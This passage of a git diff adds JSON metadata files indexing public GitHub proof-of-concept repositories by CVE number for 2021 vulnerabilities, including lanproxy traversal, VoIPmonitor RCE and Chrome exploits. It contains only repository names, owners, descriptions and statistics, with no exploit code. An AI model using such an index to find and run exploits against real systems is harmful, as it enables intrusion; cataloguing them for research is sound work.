@@ -0,0 +1,32 @@
+[
+ {
+ "id": 374891682,
+ "name": "CVE-2021-29505",
+ "full_name": "MyBlackManba\/CVE-2021-29505",
+ "owner": {
+ "login": "MyBlackManba",
+ "id": 31227970,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31227970?v=4",
+ "html_url": "https:\/\/github.com\/MyBlackManba"
+ },
+ "html_url": "https:\/\/github.com\/MyBlackManba\/CVE-2021-29505",
+ "description": "对CVE-2021-29505进行复现,并分析学了下Xstream反序列化过程",
+ "fork": false,
+ "created_at": "2021-06-08T05:27:57Z",
+ "updated_at": "2022-06-06T07:31:56Z",
+ "pushed_at": "2021-06-08T05:55:57Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-29627.json b/2021/CVE-2021-29627.json
new file mode 100644
index 0000000000..8f374af1e7
--- /dev/null
+++ b/2021/CVE-2021-29627.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 357104598,
+ "name": "cve-2021-29627",
+ "full_name": "raymontag\/cve-2021-29627",
+ "owner": {
+ "login": "raymontag",
+ "id": 106421,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/106421?v=4",
+ "html_url": "https:\/\/github.com\/raymontag"
+ },
+ "html_url": "https:\/\/github.com\/raymontag\/cve-2021-29627",
+ "description": "Trigger-only for CVE-2021-29627",
+ "fork": false,
+ "created_at": "2021-04-12T07:51:03Z",
+ "updated_at": "2023-04-10T13:59:37Z",
+ "pushed_at": "2021-04-12T07:51:40Z",
+ "stargazers_count": 13,
+ "watchers_count": 13,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 13,
+ "score": 0,
+ "subscribers_count": 4
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-30005.json b/2021/CVE-2021-30005.json
new file mode 100644
index 0000000000..f63183efd1
--- /dev/null
+++ b/2021/CVE-2021-30005.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 250616831,
+ "name": "CVE-2021-30005-POC",
+ "full_name": "atorralba\/CVE-2021-30005-POC",
+ "owner": {
+ "login": "atorralba",
+ "id": 11612352,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11612352?v=4",
+ "html_url": "https:\/\/github.com\/atorralba"
+ },
+ "html_url": "https:\/\/github.com\/atorralba\/CVE-2021-30005-POC",
+ "description": null,
+ "fork": false,
+ "created_at": "2020-03-27T18:41:07Z",
+ "updated_at": "2023-01-02T11:52:48Z",
+ "pushed_at": "2021-05-12T11:15:44Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-3007.json b/2021/CVE-2021-3007.json
new file mode 100644
index 0000000000..989bf2b3da
--- /dev/null
+++ b/2021/CVE-2021-3007.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 368556385,
+ "name": "ZF3_CVE-2021-3007",
+ "full_name": "Vulnmachines\/ZF3_CVE-2021-3007",
+ "owner": {
+ "login": "Vulnmachines",
+ "id": 79006904,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79006904?v=4",
+ "html_url": "https:\/\/github.com\/Vulnmachines"
+ },
+ "html_url": "https:\/\/github.com\/Vulnmachines\/ZF3_CVE-2021-3007",
+ "description": "ZendFramework_CVE-2021-3007 PoC",
+ "fork": false,
+ "created_at": "2021-05-18T14:16:02Z",
+ "updated_at": "2023-09-28T11:27:46Z",
+ "pushed_at": "2021-05-18T14:17:26Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-30109.json b/2021/CVE-2021-30109.json
new file mode 100644
index 0000000000..d14685849a
--- /dev/null
+++ b/2021/CVE-2021-30109.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 354793600,
+ "name": "CVE-2021-30109",
+ "full_name": "Hackdwerg\/CVE-2021-30109",
+ "owner": {
+ "login": "Hackdwerg",
+ "id": 22836086,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22836086?v=4",
+ "html_url": "https:\/\/github.com\/Hackdwerg"
+ },
+ "html_url": "https:\/\/github.com\/Hackdwerg\/CVE-2021-30109",
+ "description": "Froala Persistent XSS",
+ "fork": false,
+ "created_at": "2021-04-05T10:14:48Z",
+ "updated_at": "2021-04-29T02:56:24Z",
+ "pushed_at": "2021-04-06T10:44:26Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 3
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-30128.json b/2021/CVE-2021-30128.json
new file mode 100644
index 0000000000..b864c59785
--- /dev/null
+++ b/2021/CVE-2021-30128.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 362903981,
+ "name": "CVE-2021-30128-EXP",
+ "full_name": "LioTree\/CVE-2021-30128-EXP",
+ "owner": {
+ "login": "LioTree",
+ "id": 12847578,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12847578?v=4",
+ "html_url": "https:\/\/github.com\/LioTree"
+ },
+ "html_url": "https:\/\/github.com\/LioTree\/CVE-2021-30128-EXP",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-04-29T17:59:59Z",
+ "updated_at": "2023-06-17T08:04:54Z",
+ "pushed_at": "2021-04-30T15:01:38Z",
+ "stargazers_count": 19,
+ "watchers_count": 19,
+ "has_discussions": false,
+ "forks_count": 12,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 12,
+ "watchers": 19,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-30146.json b/2021/CVE-2021-30146.json
new file mode 100644
index 0000000000..9e320fe45c
--- /dev/null
+++ b/2021/CVE-2021-30146.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 355128115,
+ "name": "CVE-2021-30146",
+ "full_name": "Security-AVS\/CVE-2021-30146",
+ "owner": {
+ "login": "Security-AVS",
+ "id": 72926885,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72926885?v=4",
+ "html_url": "https:\/\/github.com\/Security-AVS"
+ },
+ "html_url": "https:\/\/github.com\/Security-AVS\/CVE-2021-30146",
+ "description": "Seafile 7.0.5 Persistent XSS",
+ "fork": false,
+ "created_at": "2021-04-06T09:16:37Z",
+ "updated_at": "2023-12-15T06:39:19Z",
+ "pushed_at": "2021-04-06T09:19:48Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-3019.json b/2021/CVE-2021-3019.json
new file mode 100644
index 0000000000..38af400b5f
--- /dev/null
+++ b/2021/CVE-2021-3019.json
@@ -0,0 +1,242 @@
+[
+ {
+ "id": 328097281,
+ "name": "CVE-2021-3019",
+ "full_name": "B1anda0\/CVE-2021-3019",
+ "owner": {
+ "login": "B1anda0",
+ "id": 74232513,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74232513?v=4",
+ "html_url": "https:\/\/github.com\/B1anda0"
+ },
+ "html_url": "https:\/\/github.com\/B1anda0\/CVE-2021-3019",
+ "description": "lanproxy 目录遍历漏洞批量检测 (CVE-2021-3019)",
+ "fork": false,
+ "created_at": "2021-01-09T07:11:38Z",
+ "updated_at": "2023-09-28T11:23:47Z",
+ "pushed_at": "2021-01-09T07:14:26Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 5,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 5,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 328546705,
+ "name": "CVE-2021-3019",
+ "full_name": "0xf4n9x\/CVE-2021-3019",
+ "owner": {
+ "login": "0xf4n9x",
+ "id": 40891670,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40891670?v=4",
+ "html_url": "https:\/\/github.com\/0xf4n9x"
+ },
+ "html_url": "https:\/\/github.com\/0xf4n9x\/CVE-2021-3019",
+ "description": "CVE-2021-3019 lanproxy目录遍历任意文件读取漏洞探测POC",
+ "fork": false,
+ "created_at": "2021-01-11T04:18:44Z",
+ "updated_at": "2023-09-28T11:23:50Z",
+ "pushed_at": "2021-03-19T14:42:49Z",
+ "stargazers_count": 14,
+ "watchers_count": 14,
+ "has_discussions": false,
+ "forks_count": 6,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 6,
+ "watchers": 14,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 329537345,
+ "name": "CVE-2021-3019",
+ "full_name": "Maksim-venus\/CVE-2021-3019",
+ "owner": {
+ "login": "Maksim-venus",
+ "id": 35008035,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35008035?v=4",
+ "html_url": "https:\/\/github.com\/Maksim-venus"
+ },
+ "html_url": "https:\/\/github.com\/Maksim-venus\/CVE-2021-3019",
+ "description": "lanproxy 目录遍历漏洞批量检测用户名密码POC (CVE-2021-3019)",
+ "fork": false,
+ "created_at": "2021-01-14T07:19:21Z",
+ "updated_at": "2023-09-28T11:23:56Z",
+ "pushed_at": "2021-01-14T07:52:31Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 346618078,
+ "name": "CVE-2021-3019",
+ "full_name": "murataydemir\/CVE-2021-3019",
+ "owner": {
+ "login": "murataydemir",
+ "id": 16391655,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16391655?v=4",
+ "html_url": "https:\/\/github.com\/murataydemir"
+ },
+ "html_url": "https:\/\/github.com\/murataydemir\/CVE-2021-3019",
+ "description": "[CVE-2021-3019] LanProxy Directory Traversal",
+ "fork": false,
+ "created_at": "2021-03-11T07:40:44Z",
+ "updated_at": "2023-09-28T11:25:41Z",
+ "pushed_at": "2021-03-11T08:13:00Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 350235820,
+ "name": "cve-2021-3019",
+ "full_name": "Aoyuh\/cve-2021-3019",
+ "owner": {
+ "login": "Aoyuh",
+ "id": 48713040,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48713040?v=4",
+ "html_url": "https:\/\/github.com\/Aoyuh"
+ },
+ "html_url": "https:\/\/github.com\/Aoyuh\/cve-2021-3019",
+ "description": "lanproxy(CVE-2021-3019)目录遍历",
+ "fork": false,
+ "created_at": "2021-03-22T06:44:07Z",
+ "updated_at": "2021-03-22T06:44:07Z",
+ "pushed_at": "2021-03-22T06:44:07Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 357764838,
+ "name": "CVE-2021-3019",
+ "full_name": "givemefivw\/CVE-2021-3019",
+ "owner": {
+ "login": "givemefivw",
+ "id": 65514141,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65514141?v=4",
+ "html_url": "https:\/\/github.com\/givemefivw"
+ },
+ "html_url": "https:\/\/github.com\/givemefivw\/CVE-2021-3019",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-04-14T03:45:38Z",
+ "updated_at": "2023-09-28T11:26:47Z",
+ "pushed_at": "2021-04-14T03:53:44Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 402656166,
+ "name": "CVE-2021-3019-Lanproxy",
+ "full_name": "qiezi-maozi\/CVE-2021-3019-Lanproxy",
+ "owner": {
+ "login": "qiezi-maozi",
+ "id": 80675902,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/80675902?v=4",
+ "html_url": "https:\/\/github.com\/qiezi-maozi"
+ },
+ "html_url": "https:\/\/github.com\/qiezi-maozi\/CVE-2021-3019-Lanproxy",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-09-03T05:24:41Z",
+ "updated_at": "2023-09-28T11:31:05Z",
+ "pushed_at": "2021-09-03T05:32:50Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 684997586,
+ "name": "CVE-2021-3019",
+ "full_name": "a1665454764\/CVE-2021-3019",
+ "owner": {
+ "login": "a1665454764",
+ "id": 143511005,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/143511005?v=4",
+ "html_url": "https:\/\/github.com\/a1665454764"
+ },
+ "html_url": "https:\/\/github.com\/a1665454764\/CVE-2021-3019",
+ "description": "CVE-2021-3019",
+ "fork": false,
+ "created_at": "2023-08-30T09:41:09Z",
+ "updated_at": "2023-11-09T02:46:51Z",
+ "pushed_at": "2023-08-30T09:45:12Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-30357.json b/2021/CVE-2021-30357.json
new file mode 100644
index 0000000000..9c751cfe7a
--- /dev/null
+++ b/2021/CVE-2021-30357.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 655433191,
+ "name": "CVE-2021-30357_CheckPoint_SNX_VPN_PoC",
+ "full_name": "joaovarelas\/CVE-2021-30357_CheckPoint_SNX_VPN_PoC",
+ "owner": {
+ "login": "joaovarelas",
+ "id": 6439813,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6439813?v=4",
+ "html_url": "https:\/\/github.com\/joaovarelas"
+ },
+ "html_url": "https:\/\/github.com\/joaovarelas\/CVE-2021-30357_CheckPoint_SNX_VPN_PoC",
+ "description": "Proof-of-Concept for privileged file read through CheckPoint SNX VPN Linux Client ",
+ "fork": false,
+ "created_at": "2023-06-18T21:52:28Z",
+ "updated_at": "2023-09-11T10:32:54Z",
+ "pushed_at": "2023-06-20T10:27:14Z",
+ "stargazers_count": 6,
+ "watchers_count": 6,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 6,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-30461.json b/2021/CVE-2021-30461.json
new file mode 100644
index 0000000000..f6b98ed706
--- /dev/null
+++ b/2021/CVE-2021-30461.json
@@ -0,0 +1,130 @@
+[
+ {
+ "id": 365055978,
+ "name": "CVE-2021-30461",
+ "full_name": "daedalus\/CVE-2021-30461",
+ "owner": {
+ "login": "daedalus",
+ "id": 115175,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/115175?v=4",
+ "html_url": "https:\/\/github.com\/daedalus"
+ },
+ "html_url": "https:\/\/github.com\/daedalus\/CVE-2021-30461",
+ "description": "CVE-2021-30461",
+ "fork": false,
+ "created_at": "2021-05-06T22:50:32Z",
+ "updated_at": "2023-09-28T11:27:27Z",
+ "pushed_at": "2023-11-27T18:36:49Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-30461",
+ "poc",
+ "rce",
+ "voipmonitor"
+ ],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 365180712,
+ "name": "CVE-2021-30461",
+ "full_name": "Vulnmachines\/CVE-2021-30461",
+ "owner": {
+ "login": "Vulnmachines",
+ "id": 79006904,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79006904?v=4",
+ "html_url": "https:\/\/github.com\/Vulnmachines"
+ },
+ "html_url": "https:\/\/github.com\/Vulnmachines\/CVE-2021-30461",
+ "description": "VOIP RCE",
+ "fork": false,
+ "created_at": "2021-05-07T09:22:01Z",
+ "updated_at": "2023-09-28T11:27:27Z",
+ "pushed_at": "2022-07-26T05:25:52Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 366251440,
+ "name": "CVE-2021-30461",
+ "full_name": "Al1ex\/CVE-2021-30461",
+ "owner": {
+ "login": "Al1ex",
+ "id": 38161463,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38161463?v=4",
+ "html_url": "https:\/\/github.com\/Al1ex"
+ },
+ "html_url": "https:\/\/github.com\/Al1ex\/CVE-2021-30461",
+ "description": "CVE-2021-30461",
+ "fork": false,
+ "created_at": "2021-05-11T04:09:04Z",
+ "updated_at": "2023-09-28T11:27:33Z",
+ "pushed_at": "2021-05-11T04:14:47Z",
+ "stargazers_count": 13,
+ "watchers_count": 13,
+ "has_discussions": false,
+ "forks_count": 6,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-30461",
+ "voipmonitor"
+ ],
+ "visibility": "public",
+ "forks": 6,
+ "watchers": 13,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 386052413,
+ "name": "CVE-2021-30461",
+ "full_name": "puckiestyle\/CVE-2021-30461",
+ "owner": {
+ "login": "puckiestyle",
+ "id": 57447087,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57447087?v=4",
+ "html_url": "https:\/\/github.com\/puckiestyle"
+ },
+ "html_url": "https:\/\/github.com\/puckiestyle\/CVE-2021-30461",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-07-14T19:20:11Z",
+ "updated_at": "2023-01-10T03:22:58Z",
+ "pushed_at": "2021-07-14T19:20:21Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-30481.json b/2021/CVE-2021-30481.json
new file mode 100644
index 0000000000..a065318d09
--- /dev/null
+++ b/2021/CVE-2021-30481.json
@@ -0,0 +1,68 @@
+[
+ {
+ "id": 358758520,
+ "name": "CVE-2021-30481",
+ "full_name": "floesen\/CVE-2021-30481",
+ "owner": {
+ "login": "floesen",
+ "id": 7890198,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7890198?v=4",
+ "html_url": "https:\/\/github.com\/floesen"
+ },
+ "html_url": "https:\/\/github.com\/floesen\/CVE-2021-30481",
+ "description": "https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2021-30481",
+ "fork": false,
+ "created_at": "2021-04-17T01:29:31Z",
+ "updated_at": "2024-01-31T19:03:44Z",
+ "pushed_at": "2021-04-20T16:00:46Z",
+ "stargazers_count": 54,
+ "watchers_count": 54,
+ "has_discussions": false,
+ "forks_count": 7,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 7,
+ "watchers": 54,
+ "score": 0,
+ "subscribers_count": 4
+ },
+ {
+ "id": 808546624,
+ "name": "jhviw.github.io",
+ "full_name": "JHVIW\/jhviw.github.io",
+ "owner": {
+ "login": "JHVIW",
+ "id": 37812681,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37812681?v=4",
+ "html_url": "https:\/\/github.com\/JHVIW"
+ },
+ "html_url": "https:\/\/github.com\/JHVIW\/jhviw.github.io",
+ "description": "Results of my research I have done on CVE-2021-30481 and on wallhacks in the videogame Counter-Strike 2",
+ "fork": false,
+ "created_at": "2024-05-31T09:43:39Z",
+ "updated_at": "2024-06-12T08:40:18Z",
+ "pushed_at": "2024-06-04T06:18:46Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cheats",
+ "counter-strike-2",
+ "cs2",
+ "research-paper",
+ "research-project"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-30551.json b/2021/CVE-2021-30551.json
new file mode 100644
index 0000000000..c1f3af0aa4
--- /dev/null
+++ b/2021/CVE-2021-30551.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 398816965,
+ "name": "CVE-2021-30551",
+ "full_name": "xmzyshypnc\/CVE-2021-30551",
+ "owner": {
+ "login": "xmzyshypnc",
+ "id": 21278314,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21278314?v=4",
+ "html_url": "https:\/\/github.com\/xmzyshypnc"
+ },
+ "html_url": "https:\/\/github.com\/xmzyshypnc\/CVE-2021-30551",
+ "description": "my exp for chrome V8 CVE-2021-30551",
+ "fork": false,
+ "created_at": "2021-08-22T14:15:23Z",
+ "updated_at": "2024-04-04T11:49:27Z",
+ "pushed_at": "2023-04-04T06:29:52Z",
+ "stargazers_count": 22,
+ "watchers_count": 22,
+ "has_discussions": false,
+ "forks_count": 12,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 12,
+ "watchers": 22,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-30573.json b/2021/CVE-2021-30573.json
new file mode 100644
index 0000000000..3b26795656
--- /dev/null
+++ b/2021/CVE-2021-30573.json
@@ -0,0 +1,105 @@
+[
+ {
+ "id": 390723249,
+ "name": "CVE-2021-30573-PoC-Google-Chrome",
+ "full_name": "s4e-lab\/CVE-2021-30573-PoC-Google-Chrome",
+ "owner": {
+ "login": "s4e-lab",
+ "id": 75635867,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75635867?v=4",
+ "html_url": "https:\/\/github.com\/s4e-lab"
+ },
+ "html_url": "https:\/\/github.com\/s4e-lab\/CVE-2021-30573-PoC-Google-Chrome",
+ "description": "Google Chrome Use After Free vulnerability reported by S4E Team",
+ "fork": false,
+ "created_at": "2021-07-29T12:53:13Z",
+ "updated_at": "2023-09-28T11:29:58Z",
+ "pushed_at": "2021-07-29T13:18:38Z",
+ "stargazers_count": 15,
+ "watchers_count": 15,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 15,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 421034424,
+ "name": "CVE-2021-30573",
+ "full_name": "orangmuda\/CVE-2021-30573",
+ "owner": {
+ "login": "orangmuda",
+ "id": 91846073,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91846073?v=4",
+ "html_url": "https:\/\/github.com\/orangmuda"
+ },
+ "html_url": "https:\/\/github.com\/orangmuda\/CVE-2021-30573",
+ "description": "Google Chrome Vulnerabilities CVE-2021-30573",
+ "fork": false,
+ "created_at": "2021-10-25T13:25:23Z",
+ "updated_at": "2023-09-28T11:32:38Z",
+ "pushed_at": "2021-10-31T21:47:51Z",
+ "stargazers_count": 11,
+ "watchers_count": 11,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "chrome",
+ "cve-2021-30573"
+ ],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 11,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 421328933,
+ "name": "CVE-2021-30573",
+ "full_name": "kh4sh3i\/CVE-2021-30573",
+ "owner": {
+ "login": "kh4sh3i",
+ "id": 64693844,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/64693844?v=4",
+ "html_url": "https:\/\/github.com\/kh4sh3i"
+ },
+ "html_url": "https:\/\/github.com\/kh4sh3i\/CVE-2021-30573",
+ "description": "Google Chrome Vulnerabilities CVE-2021-30573 allowed a remote attacker to potentially exploit heap corruption",
+ "fork": false,
+ "created_at": "2021-10-26T07:44:27Z",
+ "updated_at": "2023-10-16T14:26:36Z",
+ "pushed_at": "2021-10-26T08:55:41Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "attacker",
+ "chrome",
+ "cve",
+ "cve-2021-30573",
+ "googlechrome",
+ "heap",
+ "poc",
+ "remote",
+ "vulnerability"
+ ],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-3060.json b/2021/CVE-2021-3060.json
new file mode 100644
index 0000000000..d3f747f2e4
--- /dev/null
+++ b/2021/CVE-2021-3060.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 520968780,
+ "name": "rqu1-cve-2021-3060.py",
+ "full_name": "timb-machine-mirrors\/rqu1-cve-2021-3060.py",
+ "owner": {
+ "login": "timb-machine-mirrors",
+ "id": 49810875,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49810875?v=4",
+ "html_url": "https:\/\/github.com\/timb-machine-mirrors"
+ },
+ "html_url": "https:\/\/github.com\/timb-machine-mirrors\/rqu1-cve-2021-3060.py",
+ "description": "Clone from gist",
+ "fork": false,
+ "created_at": "2022-08-03T17:14:13Z",
+ "updated_at": "2023-04-08T19:10:35Z",
+ "pushed_at": "2022-08-03T17:14:52Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 700724228,
+ "name": "CVE-2021-3060",
+ "full_name": "anmolksachan\/CVE-2021-3060",
+ "owner": {
+ "login": "anmolksachan",
+ "id": 60771253,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60771253?v=4",
+ "html_url": "https:\/\/github.com\/anmolksachan"
+ },
+ "html_url": "https:\/\/github.com\/anmolksachan\/CVE-2021-3060",
+ "description": "CVE-2021-3060",
+ "fork": false,
+ "created_at": "2023-10-05T07:04:46Z",
+ "updated_at": "2023-10-05T07:15:36Z",
+ "pushed_at": "2023-10-05T07:17:19Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
